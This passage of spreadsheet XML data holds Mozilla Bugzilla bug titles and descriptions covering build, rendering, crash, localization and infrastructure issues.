[1] http://mxr.mozilla.org/mozilla-central/source/widget/android/nsAppShell.cpp#312</t>
  </si>
  <si>
    <t>NSPR-461270</t>
  </si>
  <si>
    <t>linking NSPR shared libs should use LDFLAGS</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10_5_4 en-us) AppleWebKit/525.18 (KHTML like Gecko) Version/3.1.2 Safari/525.20.1
Build Identifier: 3.1b2Pre
There is a bug in http://mxr.mozilla.org/mozilla-central/source/nsprpub/config/rules.mk at line #352.
The rules.mk does not pass to the $(MKSHLIB) command   the DSO_LDOPTS values properly. 
Also  DSO_LDOPTS  that are set in the .mozconfig are not being passed to the line #352. It's probably worth  filing a bug on that since otherwise there's no way to get libnspr to  link against optional additional libraries.
Reproducible: Always
Steps to Reproduce:
1.set LDFLAGS='-lgcov -static-libgcc'   DSO_LDOPTS='-lgcov -static-libgcc' in the .mozconfig file
2.run the make command 'make -f client.mk build
3.Linker fails due to unresolved gcov issues since the DSO_LDOPTS in the .mozconfig are not passed to the line #352 in the rules.mk
Actual Results:  
unsatisfied DSO reference errors
Expected Results:  
It should link and generate the libnspr4.so</t>
  </si>
  <si>
    <t>FIREFOX-248210</t>
  </si>
  <si>
    <t>pages aren't displayed since migration to 0.9</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
yahoo mail pages work fine with firefox 0.8 but since you migrate to the 0.9
version display bugs are visible on welcome page (bad layout of the page) and
some pages dont work at all (empty page reported with 0.9 or 0.8 after 0.9
installed). eveything works fine with a 0.8 standard version
note that the bug as been observed on a athlon64 (same OS) so far (not fully
tested on other computer)
Reproducible: Always
Steps to Reproduce:
1.install 0.9 over 0.8 using public installs (nightly bluid also tried)
2.surf on yahoo mail
3.
Actual Results:  
see above
Expected Results:  
well display pages just like 0.8 ...</t>
  </si>
  <si>
    <t>fmalet</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-240334</t>
  </si>
  <si>
    <t>Profile: Migration</t>
  </si>
  <si>
    <t>Make NR_RegOpen use const char*</t>
  </si>
  <si>
    <t>I've been working on some profile-migration stuff for firefox that uses libreg
directly instead of using the XPCOM wrapper goop and I found that NR_RegOpen
uses char* instead of const char*. Since this change doesn't affect the ABI of
libreg I would like to fix it.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-354466</t>
  </si>
  <si>
    <t>download page for 2.0 RC1 downloads 1.5.0.7 when JS off</t>
  </si>
  <si>
    <t>From Hendrix feedback:
http://groups.google.com/group/mozilla.feedback/browse_thread/thread/d49043e7fd4c863b/2e99f78f743731a9#2e99f78f743731a9
Steps to reproduce:
visit
http://www.mozilla.com/products/download.html?product=firefox-2.0rc1&amp;os=win&amp;lang=en-GB
with javascript turned off. The download link displayed for Windows is:
http://download.mozilla.org/?product=firefox-1.5.0.7=en-US
Note version and language are both incorrect
this works not just for en-GB but other languages too. 
When I look at the page the contents inside the  tag are not updated to Firefox2.0.</t>
  </si>
  <si>
    <t>DIRECTORY-117543</t>
  </si>
  <si>
    <t>x86Rel still has a ? when a CVS update is run</t>
  </si>
  <si>
    <t>mozilla/directory/c-sdk/ldap/libraries/msdos/winsock/x86Rel still has a ? when 
a CVS update is run through nmake.  Will attach patch (update .cvsignore).</t>
  </si>
  <si>
    <t>hamfastgamgee</t>
  </si>
  <si>
    <t>CORE-36412</t>
  </si>
  <si>
    <t>[FEATURE]Skin switching is not dynamic</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-992767</t>
  </si>
  <si>
    <t>backport bug 987032 to bmo (allow memcached to cache bugzilla configuration information)</t>
  </si>
  <si>
    <t>most of this should be a straight forward backport.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-472044</t>
  </si>
  <si>
    <t>[ru] Small update for Russian spellchecking dictionary</t>
  </si>
  <si>
    <t>Created attachment 355294
Patch
Small update for Russian spellchecking dictionary</t>
  </si>
  <si>
    <t>CORE-319713</t>
  </si>
  <si>
    <t>document.close handled from an external script is mildly incorrect</t>
  </si>
  <si>
    <t>This is a true edge case that came from bug 319123. The basic problem is the construct:
// Document 1
document.write(Foo!)
// document2.js
document.close()
Before my fix for bug 319123 we used to not really respect the close() call and actually leak the parser and all of the related stuff. Now we terminate the parser but that means that we lose the Foo!. IE seems to only respect the document.close after the document.write is done (i.e. a second document.write() after the one that closes the document actually starts a new document). I'm not sure what IE does with other s after the document.close though.</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-984792</t>
  </si>
  <si>
    <t>Gaia::System::Window Mgmt</t>
  </si>
  <si>
    <t>Task manager doesn't take direction or extent of drag into account</t>
  </si>
  <si>
    <t>When bringing up the task switcher it seems it's quite a distance your finger has to travel before it responds to the input - it feels very unnatural. It also very frequently mistakes a drag for a selection.
This is contrary to the home screen which for the most part is ok or indeed the kinetic scrolling available in all apps that responds quickly and feels very immediate.</t>
  </si>
  <si>
    <t>CORE-507036</t>
  </si>
  <si>
    <t>NJ merge: Move valgrind icache-flush notification to CodeAlloc.</t>
  </si>
  <si>
    <t>Created attachment 391219
Remove the old line
Residual removal of moved code from tamarin cset 91dd66538820. New home for it is already integrated into bug 504462.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-375229</t>
  </si>
  <si>
    <t>Preview/Production Remora Database Update</t>
  </si>
  <si>
    <t>Please run the following query on the db:
UPDATE files SET status = 1 WHERE version_id IN (SELECT v.id FROM versions v INNER JOIN addons a ON (a.id = v.addon_id) WHERE a.status = 1 OR a.status = 2 OR a.status=3) AND status = 4
We had this query run before it's to set sandboxed addon files to also be sandboxed due to a migration issue but we missed a couple of related statuses.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-296856</t>
  </si>
  <si>
    <t>Widget: BeOS</t>
  </si>
  <si>
    <t>[BEOS] nsWindow suggested window creation changes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.8b2) Gecko/20050604 Firefox/1.0+
Build Identifier: 
Removing and moving some code around. nsWindows now start out with transparent
and relies on BaseWidget to set some variables (border and window type is set in
 StandardWindowCreate anyway). 
OnPaint removed code (wasn't that code obsolete Sergei) and refactored to get 
away from ifs in ifs ugliness (IMO).
SetBackgroundColor only sets backgroundcolor the view set itself transparent
when attached to a window instead.
We set the lastViewWidth and height in the constructor from the frame instead. 
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-108736</t>
  </si>
  <si>
    <t>learn to spell</t>
  </si>
  <si>
    <t>(I lurned to speel frum kip.) s/propogate/propagate/ in the XUL template stuff.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-285517</t>
  </si>
  <si>
    <t>show better message in helper app dialog when the type was sniffed from text/plain (determined to by binary content)</t>
  </si>
  <si>
    <t>[I believed this to be a duplicate but can't find a bug]
nsIExternalHelperAppLauncherDialog::show should differentiate between normal
unknown type and type sniffed from text/plain i.e. change aForced into a
PRUint32 w/ some constants</t>
  </si>
  <si>
    <t>CORE-487566</t>
  </si>
  <si>
    <t>OS/2 problems to build qcms</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.9.2a1pre) Gecko/20090406 Minefield/3.6a1pre
Build Identifier: 
I came across two problems when building the new qcms color management on OS/2 (unfortunately I have clobbered my build log)
1) stdlib.h on OS/2 has already a typedef for uintptr_t (typdefed in qcmstypes.h) -&gt; to not include stdlib.h on OS/2 helps
2) OS/2 is little endian but that doesn't get picked up
Here I wonder why LITTLE_ENDIAN has to be defined for windows but not for linux using as well LITTLE_ENDIAN byte order
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-426273</t>
  </si>
  <si>
    <t>[FIX]Content Encoding Error page displayed when redownloading a previously cancelled .tar.gz file</t>
  </si>
  <si>
    <t>STR:
1. Navigate to http://www.w3.org/Graphics/SVG/Test/
2. Click on the first bulleted link W3C SVG 1.2 Tiny Test Suite (http://www.w3.org/Graphics/SVG/Test/20070907/W3C_SVG_12_TinyTestSuite.tar.gz)
3. Click cancel on the save dialog.
4. Click the link again.
5. Content Encoding Error page displayed.
To fix things up all you have to do is clear your cache. Note that if you don't cancel but instead continue with the download you will be able to continue retrying successfully forever. It's that first cancel that seems to break everything.
Firefox 2 has worse behavior - it doesn't display the error page but just sits there looking dumb.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-504153</t>
  </si>
  <si>
    <t>Update DOMi compat info for SeaMonkey 2.0b2 and Thunderbird 3.0b4</t>
  </si>
  <si>
    <t>Current DOMi should be updated to be compatible with up to SeaMonkey 2.0b2 and Thunderbird 3.0b4 both in the install.rdf on trunk and the AMO settings for the latest version.
We should keep up what we did with SM2.0b1 and not use the pre there so we'll be compatible without further change with the upcoming release when cutting it. If we use the version number of 2.0b2 without the pre now that should work fine once again (same for TB). :)</t>
  </si>
  <si>
    <t>BUGZILLA-291600</t>
  </si>
  <si>
    <t>Replace iff with if and only if</t>
  </si>
  <si>
    <t>iff should be if in globals.pl and Bugzilla/Config.pm.</t>
  </si>
  <si>
    <t>CORE-401718</t>
  </si>
  <si>
    <t>[UA] Remove Mach-O from UA on PPC</t>
  </si>
  <si>
    <t>Split off from bug 400089.
PPC UAs now include PPC Mac OS X Mach-O 10.4
You simply cannot currently create a CFM build of Gecko anymore. At this point Mach-O is just unnecessary cruft in the PPC UA.
However removing a token from our UA may break websites. Though matching on Mach-O probably/hopefully isn't common since at this point all it tells you is that someone is running a PPC build which they could easily get by matching PPC.
Along those same lines I am having a hard time thinking of situations in which someone would have been using Mach-O to do useful detection of anything that's relevant today. It doesn't detect Mac OS X since only PPC builds have it. It was never the only way to detect if you were pre-X or X and even if it was it would have been a pretty unreliable indicator as CFM for OS X builds were shipped or at least I get that impression from bugzilla history.
Thoughts?</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-200545</t>
  </si>
  <si>
    <t>Caret is not visible when replying to a message</t>
  </si>
  <si>
    <t>At least since 20030402 the caret has been invisible when replying to a message.
Possibly caused by checkin for bug 35296. Latest test using 2003040308 on WinXP.</t>
  </si>
  <si>
    <t>emaijala+moz</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-91694</t>
  </si>
  <si>
    <t>opticlik.net - page source displayed</t>
  </si>
  <si>
    <t>Loading the above URL displace page source!</t>
  </si>
  <si>
    <t>CORE-307081</t>
  </si>
  <si>
    <t>nsIClientAuthDialogs::ChooseCertificate should pass an nsIArray of nsIX509Certs not strings</t>
  </si>
  <si>
    <t>nsIClientAuthDialogs::ChooseCertificate looks like:
  NS_IMETHOD ChooseCertificate(nsIInterfaceRequestor *ctx const PRUnichar *cn
const PRUnichar *organization const PRUnichar *issuer const PRUnichar
**certNickList const PRUnichar **certDetailsList PRUint32 count PRInt32
*selectedIndex PRBool *canceled) = 0
which makes it hard for an implementor to do non-sucky UI.
Despite the name the strings of 'certNickList' are not real nicknames they are
nicknames with the serial number appended:
http://lxr.mozilla.org/mozilla/source/security/manager/ssl/src/nsNSSCertificate.cpp#258
so without some string parsing I can't even use them to look up nsIX509Certs!</t>
  </si>
  <si>
    <t>SEAMONKEY-159771</t>
  </si>
  <si>
    <t>Some colors in classic theme are weird</t>
  </si>
  <si>
    <t>eColor_highlight looks weird also menu color may correspond to system-wide as
Classic Theme should match platform as possible.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-294190</t>
  </si>
  <si>
    <t>Approval Queue: Install Link broken</t>
  </si>
  <si>
    <t>Due to bug 246754 the InstallTrigger doesn't like the 302 redirect.  We need to
either use a regex to make it use the right host or we need to just use a
relative path to approvalfile.php</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-36293</t>
  </si>
  <si>
    <t>bil.lu - Page doesn't display everything</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U WinNT4.0 en-US m15)
BuildID:    2000041805
When visiting my bank at http://www.bil.lu I can only see the top menu bar. The
rest of the page remains hidden. (In Netscape 4.x and IE5.01 it's displaying
correctly	
Reproducible: Always
Steps to Reproduce:
1.Go to http://www.bil.lu with Mozilla
Actual Results:  The page loads and only the top menu bar appears. The rest
isn't displayed/loaded	
Expected Results:  Mozilla should display the entire page</t>
  </si>
  <si>
    <t>dtsweb</t>
  </si>
  <si>
    <t>FIREFOX-265172</t>
  </si>
  <si>
    <t>Hang and 100% CPU usage sometimes during restore/resume from sleep/standby/hibernate - update your flash player</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10.1
The basic scenario is that I am using a laptop which I move frequently but
almost never shutdown.  I go on and off wired and wireless networks several
times per day.  Perhaps 25%-50% of the time Firefox pegs the CPU when I am
restoring from sleep mode.  This makes the wake-up take forever.  
It seems to be related to the fact that there's no network available yesterday
CPU usage spiked right after I disabled my wireless card.  (Which I always do
using the plug/play icons in the taskbar.)
Firefox usually returns to normal behavior after a few minutes although
sometimes it can take up to 15-20 minutes.
Admittedly I haven't got a 100% reproducible scenanrio here.  But it happens to
me several times a week and is very frustrating.
Reproducible: Didn't try
Steps to Reproduce:
1. See above.
2.
3.</t>
  </si>
  <si>
    <t>rg</t>
  </si>
  <si>
    <t>BUGZILLA-321691</t>
  </si>
  <si>
    <t xml:space="preserve">duplicates.cgi doesn't use </t>
  </si>
  <si>
    <t>most of bugzilla is nice and uses th but duplicates does not.</t>
  </si>
  <si>
    <t>THUNDERBIRD-503624</t>
  </si>
  <si>
    <t>Prefs to mark all RSS or NNTP messages read when exiting the folder no longer work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1) Gecko/20090630 Firefox/3.5 (.NET CLR 3.5.30729) (tete009 SSE2 PGO)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1pre) Gecko/20090613 Lightning/1.0pre Shredder/3.0b3pre
For every build after 6/13 the about:config preferences mailnews.mark_message_read.nntp and mailnews.mark_message_read.rss no longer work.
When you exit an RSS field or Newgroup list the unread messages are not automatically marked read.  
This seems to belong as part of the tracking bug for 497199 and is extremely important for me.  I skim many different RSS feeds and NNTP newsgroups and do not read every message and have my views set to only show read messages.  If I now have to manually mark everything as read it is a HUGE usability setback.
Reproducible: Always
Steps to Reproduce:
1. Set prefs to true in about:config editor
2. Go into an RSS feed or NNTP folder
3. Switch to another folder with unread message in the original RSS or NNTP folder
Actual Results:  
Unread messages are NOT marked as read.
Expected Results:  
Unread messages should all be marked as read.</t>
  </si>
  <si>
    <t>danbrum</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-868989</t>
  </si>
  <si>
    <t>tracking bug for build and release of thunderbird 17.0.7 esr</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-363000</t>
  </si>
  <si>
    <t>Protect against spaces in the source directory.</t>
  </si>
  <si>
    <t>Part of the protect against common build errors push: error out early if the source directory contains a space.</t>
  </si>
  <si>
    <t>CORE-318193</t>
  </si>
  <si>
    <t>Input streams are not implemented consistently</t>
  </si>
  <si>
    <t>Input streams are not implemented consistently
This is a spin-off from bug 316372.</t>
  </si>
  <si>
    <t>CORE-113098</t>
  </si>
  <si>
    <t>lazy calls to parentContext-&gt;GetStyleData</t>
  </si>
  <si>
    <t>In bug 111815 I removed the last vestiges of having lazy calls to
parentContext-&gt;GetStyleData in the nsRuleNode::Compute*Data functions.  I think
we should make this lazy and the easy way to do that would be to add two new
eRuleDetail values -- eRuleFullReset and eRulePartialReset.  This probably would
give some space savings.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-320009</t>
  </si>
  <si>
    <t>Need CVS account/access</t>
  </si>
  <si>
    <t>I need a CVS account to make changes to website content and stuff like that.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-469635</t>
  </si>
  <si>
    <t>ALSA error messages from esound daemon on Linux build machines</t>
  </si>
  <si>
    <t>The landing of bug 419275 is causing random oranges on Linux tinderboxes:
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1229140245.1229142959.23926.gz
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1229322185.1229324135.13138.gz
The errors seem to be libcanberra causing alsa to report errors caused by lack of a sound card in the tinderbox machine.
These errors are similar to ones I use to get in the video code that used the
libsydneyaudio alsa backend. The alsa library outputs error messages in a
'chatty' fashion and we had to turn them off in a change to libsydneyaudio.</t>
  </si>
  <si>
    <t>CORE-465158</t>
  </si>
  <si>
    <t>Minefield Nightly fails to initiate dial-up login when using internet connection sharing</t>
  </si>
  <si>
    <t>The PC has a modem and one NIC. There is ICS enabled on it so the NIC is assigned a permanent address. Bug 454381 has changed the code to raise dial-up only when all adapters doesn't have any IP address. In this case the code believes there is still a connection and prevents dial-up login dialog to open.
I have to think of a different approach for condition to start dial-up.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-37566</t>
  </si>
  <si>
    <t>mozbot familily unable to read tree status</t>
  </si>
  <si>
    <t>and you're the only person too change it in a week. Timeless asked me to file
this for him because he had to leave so if you need better info ask him but he
seemed pretty sure it was tinderbox changes at fault.
 Tinderbox status from http://tinderbox.mozilla.org/showbuilds.cgi
 SeaMonkey  : - no known bustage -
 last update: 04/28/2000 14:58 (5 minutes ago)
when all mac and windows platforms were in flames...</t>
  </si>
  <si>
    <t>puetzk</t>
  </si>
  <si>
    <t>SEAMONKEY-36853</t>
  </si>
  <si>
    <t>libjar depends on nsIPSMComponent.h</t>
  </si>
  <si>
    <t>You can't build the browser without the psm-glue extension which is wrong: you
shouldn't need any extensions to build the core browser which is why they're
extensions.
Maybe we need to move nsIPSMComponent's definition into another area
(mozilla/security/public and make it always build?) or perhaps define a more
generic nsISignatureVerifier interface that something in psm-glue can implement
but this dependency shouldn't live through to the feature-complete beta.</t>
  </si>
  <si>
    <t>CORE-98239</t>
  </si>
  <si>
    <t>innerHTML on button funkyness</t>
  </si>
  <si>
    <t>Go to URL do the english one... Start and stop...the button gets reaaaly small.
Play with the manual controls and Start again...odd.
That code works fine in IE5 and 5.5.
This works ok if I use an input type=button and change it's .value (the stuff
that's commented out in the source).
If innerHTML is an extention is there some standard way to change the
's text?</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-411221</t>
  </si>
  <si>
    <t>Restart chat server</t>
  </si>
  <si>
    <t>The Openfire (Jabber) server at chat-support.mozilla.com needs to be restarted.  Many helpers are unable to answer questions and the conference rooms permissions seem to have been changed by unauthorized users.
Ask in the #sumo on irc.mozilla.org before restarting to make sure that any open questions can be resolved first.</t>
  </si>
  <si>
    <t>CALENDAR-317868</t>
  </si>
  <si>
    <t>minimonth and timepicker should be scrollable</t>
  </si>
  <si>
    <t>I had a friend over using my computer last week.  She'd never used Linux before but intuitively assumed that using the scrollwheel on the mini-calendar display in the system tray would change the displayed month.  We should implement this feature especially in the minimonth to cut down on the number of clicks necessary to move the displayed month.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-437342</t>
  </si>
  <si>
    <t>Create .html.po conversion script</t>
  </si>
  <si>
    <t>We should think this one through because we have to figure out how to split up a .html file into chunks that are useful to localize without losing context.  We'll also need to pull out img alt tags ignore php but remember to pull in titles etc.  This script may be pretty specific to Mozilla.
It looks like there is an html2po script in the translate toolkit - we might look at that for ideas or maybe we could use it.
We'll need this for files on mozilla.com (example: http://svn.mozilla.org/projects/mozilla.com/branches/firefox3/pt-BR/index.html) and the full pages on AMO (example: http://svn.mozilla.org/addons/trunk/site/app/locale/de/pages/policy.thtml)</t>
  </si>
  <si>
    <t>TOOLKIT-331629</t>
  </si>
  <si>
    <t>nsAutoCompleteController::ClosePopup 91c5d689</t>
  </si>
  <si>
    <t>Stack Signature	 nsAutoCompleteController::ClosePopup 91c5d689
Product ID	Firefox15
Build ID	2006011112
Trigger Time	2006-03-24 12:06:39.0
Platform	Win32
Operating System	Windows NT 5.1 build 2600
Module	firefox.exe + (003ff412)
URL visited	
User Comments	
Since Last Crash	282 sec
Total Uptime	122668 sec
Trigger Reason	Access violation
Source File Line No.	c:/builds/tinderbox/Fx-Mozilla1.8.0/WINNT_5.2_Depend/mozilla/toolkit/components/autocomplete/src/nsAutoCompleteController.cpp line 862
Stack Trace 	
nsAutoCompleteController::ClosePopup  [c:/builds/tinderbox/Fx-Mozilla1.8.0/WINNT_5.2_Depend/mozilla/toolkit/components/autocomplete/src/nsAutoCompleteController.cpp line 862]
nsAutoCompleteController::PostSearchCleanup  [c:/builds/tinderbox/Fx-Mozilla1.8.0/WINNT_5.2_Depend/mozilla/toolkit/components/autocomplete/src/nsAutoCompleteController.cpp line 1109]
nsAutoCompleteController::OnSearchResult  [c:/builds/tinderbox/Fx-Mozilla1.8.0/WINNT_5.2_Depend/mozilla/toolkit/components/autocomplete/src/nsAutoCompleteController.cpp line 589]
nsGlobalHistory::StartSearch  [c:/builds/tinderbox/Fx-Mozilla1.8.0/WINNT_5.2_Depend/mozilla/toolkit/components/history/src/nsGlobalHistory.cpp line 4231]
nsAutoCompleteController::StartSearch  [c:/builds/tinderbox/Fx-Mozilla1.8.0/WINNT_5.2_Depend/mozilla/toolkit/components/autocomplete/src/nsAutoCompleteController.cpp line 901]
nsAutoCompleteController::Notify  [c:/builds/tinderbox/Fx-Mozilla1.8.0/WINNT_5.2_Depend/mozilla/toolkit/components/autocomplete/src/nsAutoCompleteController.cpp line 602]
nsAppStartup::Run  [c:/builds/tinderbox/Fx-Mozilla1.8.0/WINNT_5.2_Depend/mozilla/toolkit/components/startup/src/nsAppStartup.cpp line 151]
main  [c:/builds/tinderbox/Fx-Mozilla1.8.0/WINNT_5.2_Depend/mozilla/browser/app/nsBrowserApp.cpp line 61]
kernel32.dll + 0x16d4f (0x7c816d4f)
Steps to reproduce:
(1) Firefox 1.5.0.1 for Windows
(2) Modify Venkman (JavaScript Debugger) XPI as listed on addons.mozilla.org to work in Firefox 1.5.
(3) Run Venkman in the background
(4) Find a form with an autocomplete text input
(5) Fill out the form.
(6) Revisit the form and begin re-entering the value in the autocomplete text input you last used.
Expected result:
Autocomplete shows you a suggested entry.
Actual result:
Crash.</t>
  </si>
  <si>
    <t>CORE-400259</t>
  </si>
  <si>
    <t>remove nsIMenuListener interface</t>
  </si>
  <si>
    <t>Created attachment 285339
fix v1.0
We can probably safely remove the nsIMenuListener interface now which I did in some of my spare time recently.
This saves 4 bytes per nsIWidget on all platforms. Saves 4 bytes per menu item on Mac OS X (we can easily have many hundreds of menu items in existence with a few Firefox windows open). Saves 4 bytes per menu on Mac OS X. We save a small amount of memory in overall code size on all platforms.
Fewer expensive QI calls in critical places. More direct typing increases code clarity. Removes a lot of unnecessary code including many method implementations that only exist to satisfy common interface requirements. It'll be much easier to decomtaminate our Mac OS X menu code in the future with this (exploring menu impl decom is what led me to doing this in the first place).</t>
  </si>
  <si>
    <t>FIREFOX-357032</t>
  </si>
  <si>
    <t>Accessible text implementation of entry does not provide valid text</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061016 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061016 Minefield/3.0a1
Please refer to http://bugzilla.gnome.org/show_bug.cgi?id=355745 for the description of the bug.  Upon analysis of the entry areas in question (using at-poke) it doesn't appear as though the implementation is providing any useful text.  Instead it seems to provide a single embedded object character as the text.  I think a proper implementation for the entry should probably provide the exact text being displayed in the entry.
Reproducible: Always
Steps to Reproduce:
Please refer to http://bugzilla.gnome.org/show_bug.cgi?id=355745 for the description of the bug.
Actual Results:  
The accessible text for the entry consists of a single embedded object character.  Also notice the very odd behavior when you edit the editable text area in at-poke - the entry in Firefox is populated with very bizarre results.
Expected Results:  
I'd expect the accessible text implementation to provide the exact text that is in the entry.  I'd also expect that editing the text in at-poke results in the exact same text showing up in the entry.</t>
  </si>
  <si>
    <t>CALENDAR-381885</t>
  </si>
  <si>
    <t>Need to write release notes for the 0.5 Calendar Release</t>
  </si>
  <si>
    <t>This is a tracking bug for the release notes for the 0.5 calendar release.  If you have any issues that are NOT bugs that need to be covered by our release notes please mention them here.  Bugs should be tracked via the relnote keyword.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-443657</t>
  </si>
  <si>
    <t>Registrations are closed</t>
  </si>
  <si>
    <t>We've hit the registration quota.  We should raise it but we may need to use the second fs node before we can do that.</t>
  </si>
  <si>
    <t>TOOLKIT-469211</t>
  </si>
  <si>
    <t>Video/Audio Controls</t>
  </si>
  <si>
    <t>Video controls should not require initial mouse over to appear</t>
  </si>
  <si>
    <t>Currently the controls that appear for video require the user to 'mouse over' the video playback area for the controls to appear. Commonly players like YouTube have a big 'Play' icon when the video is not playing always appearing in the center of the video so users just have to click to play.
A number of users have commented that they didn't know it was a video or that it was not ready to play due to the absence of a play icon when the video is stopped. They did not know they had to mouse over. See comments here (requires JavaScript enabled):
http://tinyvid.tv/show/3d198wqepg78m
Actions to reproduce:
1) Load page in URL
2) Video in page has no controls displayed
Expected result:
1) Load page in URL
2) Video contains controls or a play button</t>
  </si>
  <si>
    <t>CORE-243277</t>
  </si>
  <si>
    <t>Offline: PAC: fails to load at startup when offline then never tries again</t>
  </si>
  <si>
    <t>STEPS:
Configure PAC.
Go offline.
Quit.
Restart (assumes that When Starting up is in default remember previous
offline mode)
When you start again PAC will error in javascript console and PAC will never load.
I still need to do more research on the behavior of PAC in cache in this situation.</t>
  </si>
  <si>
    <t>CALENDAR-324928</t>
  </si>
  <si>
    <t>Move calendar extension specific stuff on the website to the calendar extension section</t>
  </si>
  <si>
    <t>Stuff like themes and translations is currently only relevant to the Calendar extension.</t>
  </si>
  <si>
    <t>CORE-354161</t>
  </si>
  <si>
    <t>DOM pruned at depth 200</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2
I have a web page I'm trying to view which consists of some invalid HTML.  It is basically a series of several hundred tables with each table containing a couple of other tables.  Some of the  tags are not terminated with a .  This means that eventually the DOM reaches 128 nodes deep (rather than 10-12 as was intended by whoever wrote the code to view the page).  It turns out that Firefox is pruning the DOM at a depth of 128.  The page displays fine in Konqueror and IE but is pruned on Firefox.
This is not likely to be the best way to handle this situation even though I realize this was probably intentional to avoid layouts bringing the browser to its knees.
Perhaps the max number of levels should be raised to 1024 or lifted entirely?  Or child nodes added as siblings beyond a certain depth so that at least the info doesn't actually disappear?  (I thought it was a missing record problem then a server problem then a browser bug then I realized what was actually going on...)
Reproducible: Always</t>
  </si>
  <si>
    <t>MOZILLA.ORG-108206</t>
  </si>
  <si>
    <t>CVS account requests for colinp@oeone.com and mikep@oeone.com</t>
  </si>
  <si>
    <t>Mike is the new module owner for Calendar and Colin is his peer. It would be
good to get them CVS access so they can actually work on their module.
What I propose is as follows: we give them CVS accounts immediately to check
into files in the calendar directory only. This is equivalent to what we do for
Bugzilla people - 3 super-reviewers are not required and they are told to only
check in to a particular section of the tree.
Well before calendar gets turned on by default 3 super-reviewers should have
seen enough of their code to approve full access for them.
Gerv</t>
  </si>
  <si>
    <t>CORE-311545</t>
  </si>
  <si>
    <t>Support the 'writing-mode' 'direction' and 'unicode-bidi' properties in SVG</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b5) Gecko/20051006 Firefox/1.4.1
when viewing svg graphics containing hebrew (and I guess other RTL languages)
text the characters are displayed in the wrong order (from left to right) as
seen in the following URL : 
http://welcome.linux.org.il/welcome-to-linux-2004.svg
and
http://img100.imageshack.us/img100/9829/svgbidi8hv.png
however the order of the chars should be as seen here:
http://img98.imageshack.us/img98/6716/good6wq.png
the problem is in the blue hebrew text. instead of seeing:
×‘×¨×•×›×™× ×”×‘××™× ×œ×œ×™× ×•×§×¡
you see:
×¡×§×•× ×™×œ×œ ××™××‘× ××™×›×•×¨×‘
Reproducible: Always
Steps to Reproduce:
1. open an SVG file conataining RTL text
2. see the RTL text rendered as if it is an LTR text.
Actual Results:  
the image contains strings rendered left to right.
Expected Results:  
the strings should be rendered right to left instead.
using Firefox 1.5Beta2 downloaded from mozilla.org (not from my linux distro).</t>
  </si>
  <si>
    <t>SEAMONKEY-409660</t>
  </si>
  <si>
    <t>[ru] Adding Russian locale to ChatZilla all-locales file</t>
  </si>
  <si>
    <t>Please add ru locale to ChatZilla all-locales</t>
  </si>
  <si>
    <t>SEAMONKEY-366318</t>
  </si>
  <si>
    <t>wrong references to products/seamonkey</t>
  </si>
  <si>
    <t>Created attachment 250850
fix those two URLs
Apparently Mark checked in wrong URLs for SeaMonkey update stuff in bug 335154 - we have mozilla.org/products/seamonkey there instead of projects/seamonkey.
See http://lxr.mozilla.org/mozilla/search?string=org%2Fproducts%2Fseamonkey</t>
  </si>
  <si>
    <t>CORE-455763</t>
  </si>
  <si>
    <t>TM: Multiple regressions in v8/* benchmarks.</t>
  </si>
  <si>
